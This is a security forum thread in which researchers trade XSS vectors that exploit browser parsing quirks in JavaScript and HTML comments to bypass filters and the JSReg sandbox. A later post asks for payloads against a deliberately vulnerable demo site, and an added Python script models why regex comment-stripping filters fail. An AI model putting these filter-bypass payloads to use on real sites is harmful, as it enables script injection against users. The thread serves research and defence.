Breaking javascript/html comments
Posted by: jackmasa
Date: August 14, 2011 10:26AM

1.Javascript

IE:<script>/*@cc_on!alert(1)//*/</script>

Chrome:<script>/*猪/alert(3)//*/</script>

All:<script>/ //alert(1)</script>


2.HTML

<img/<!--/src=x:x onerror=alert(2)//-->

<!--[if<img src=x:x onerror=alert(5)//]-->

<!-- --!><img src="x:x" onerror=alert(1)/ />--> chrome firefox

<!-- ><img src="x:x" onerror=alert(1)/ />--> ie opera

Re: Breaking javascript/html comments
Posted by: Gareth Heyes
Date: August 14, 2011 05:08PM

The chrome one is really nice!
Why don't you try your luck with jsreg? Let's see those vectors bypassing my sandbox!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Breaking javascript/html comments
Posted by: LeverOne
Date: August 14, 2011 07:40PM

@jackmasa

Good post! Thank you! And twice a good post, if the chrome one is your find.

@Gareth

IE & GC ones are the keys to a real bypass of the current version of JSReg. Doesn't fix them for a while - show must ... ;)


Quote

I promise not to fix :) Doubt you can do it though :D

This is for those who are just starting to view for your sandbox.

----------------------
~Veritas~



Re: Breaking javascript/html comments
Posted by: jackmasa
Date: August 15, 2011 02:02AM

Meet the conditions:
\uxx2a+\u002f

like /*娪/alert(1),娪==\u5a2a
or /*帪/

Re: Breaking javascript/html comments
Posted by: Gareth Heyes
Date: August 15, 2011 05:49AM

@jackmasa

Yeah I fuzzed those and noticed :) Nice work. Awesome thread.

Chrome seems to suffer the same problems as opera:
u=alert;
\u(1)

[www.thespanner.co.uk]

@LeverOne

I promise not to fix :) Doubt you can do it though :D

Check this out:-
eval("Object.defineProperty(window,'u661',{get:function(){alert(1)}});\\u61");

Opera and Chrome can't seem to get it quite right lol

Re: Breaking javascript/html comments
Posted by: jackmasa
Date: September 04, 2011 11:31AM

keep playing:
<>>//<!/>
alert(1)



Re: Breaking javascript/html comments
Posted by: Gareth Heyes
Date: September 04, 2011 01:01PM

Yeah I knew about that one, I think I posted that to slackers ages ago. Nice though :) keep em coming

Re: Breaking javascript/html comments
Posted by: jackmasa
Date: November 08, 2011 09:25PM

Gareth's trick: <noscript><!-- </noscript> <img src=1 onerror=alert(1)> -->

Re: Breaking javascript/html comments
Posted by: jackmasa
Date: November 08, 2011 09:33PM

Superver of trick:
<script><!-- </script> <img src=1 onerror=alert(1)>
the same also:
<style><!-- </style> <img src=1 onerror=alert(1)>
<textarea><!-- </textarea><img src=1 onerror=alert(1)>

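As an added example that is not part of the thread (the script is mine, not the posters'), here is a small Python model of why a comment-stripping filter and a browser disagree on the HTML vectors above: the filter treats `<!--` as opening a comment wherever it appears, while the browser only opens a comment in the data state, also closes one on `--!>`, and reads `<!--` inside script, style or textarea content as plain text. The tokenizer below is a simplified assumption about HTML5 tokenization, not the spec in full, and the filter model assumes an unterminated comment runs to the end of input.

```python
import re
# Simplified model of the HTML5 tokenizer (an assumption, not a full parser): in
# these elements the content is raw text, so "<!--" is literal and only the
# matching end tag ends them (noscript: when scripting is enabled).
RAW_TEXT = {"script", "style", "textarea", "title", "noscript", "xmp",
            "iframe", "noembed", "noframes"}
COMMENT_END = re.compile(r"-->|--!>")   # HTML5 also closes a comment on "--!>"
HANDLER = re.compile(r"\bon\w+\s*=", re.I)

def naive_strip_comments(html):
    """Filter model: everything from '<!--' to '-->' (or end of input) is a comment."""
    return re.sub(r"<!--.*?(?:-->|$)", "", html, flags=re.S)

def browser_tags(html):
    """Start tags as the browser tokenizes them: list of (name, attribute text)."""
    tags, i, n = [], 0, len(html)
    while i < n:
        if html.startswith("<!--", i):             # a comment only opens in the data state
            m = COMMENT_END.search(html, i + 4)
            i = m.end() if m else n
        elif html[i] == "<" and i + 1 < n and html[i + 1].isalpha():
            j = html.find(">", i)                  # a tag ends at the first '>'; '<!--' inside it is just attribute text
            if j < 0:
                break
            name = re.match(r"<([A-Za-z][^\s/>]*)", html[i:j]).group(1).lower()
            tags.append((name, html[i + 1 + len(name):j]))
            i = j + 1
            if name in RAW_TEXT:                   # skip raw text up to the matching end tag
                e = re.compile(r"</%s[\s/>]" % name, re.I).search(html, i)
                i = html.find(">", e.start()) + 1 if e else n
        else:
            i += 1
    return tags

def handler_attrs(html):
    """Names of tags carrying an on*= attribute that the browser would actually see."""
    return [name for name, attrs in browser_tags(html) if HANDLER.search(attrs)]

def filter_disagrees(html):
    """True when the filter sees no handler after stripping but the browser does."""
    return not handler_attrs(naive_strip_comments(html)) and bool(handler_attrs(html))

# Vectors quoted from the thread, used here as constructed test inputs.
VECTORS = [
    '<img/<!--/src=x:x onerror=alert(2)//-->',
    '<!-- --!><img src="x:x" onerror=alert(1)/ />-->',
    '<script><!-- </script> <img src=1 onerror=alert(1)>',
    '<textarea><!-- </textarea><img src=1 onerror=alert(1)>',
]
```

For every vector in VECTORS the stripped output looks clean while the browser still sees an onerror handler, which is why a filter or WAF that reasons about comments needs a spec-compliant HTML parser (or, better, contextual output encoding) rather than a regex.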
Re: Breaking javascript/html comments
Posted by: rickm
Date: November 07, 2012 04:44AM

Hi

I'm studying XSS and I'm learning a lot here, you are very good with it. I noticed that many XSS payloads are dependent on specific browsers, however, I tested some of the payloads that you provided for generic browsers and they do not work here.

I'm using Firefox and I tested it against the IBM WatchFire that is constructed to be vulnerable.

For example, this basic XSS input works as expected:

http://demo.testfire.net/search.aspx?txtSearch=<script>alert(1)</script>

However all your XSS payloads below are not working. Can you please take a look and if possible provide a working XSS payload for this site? I would love to test / see your payloads working.


<!--[if<img src=x:x onerror=alert(5)//]-->

<!-- --!><img src="x:x" onerror=alert(1)/ />-->

<>>//<!/>
alert(1)

/*娪/alert(1),娪==\u5a2a

u=alert; \u(1)

eval("Object.defineProperty(window,'u661',{get:function(){alert(1)}});\\u61");


I tested all of them (copying and pasting) and also URL-encoding them, but none of them resulted in an alert box. Can someone kindly please give me a working example against this test page (or any other) for these payloads and in what browser it worked?

Also, for payloads with strange chars (such as 娪), how should we encode it?

Thanks.
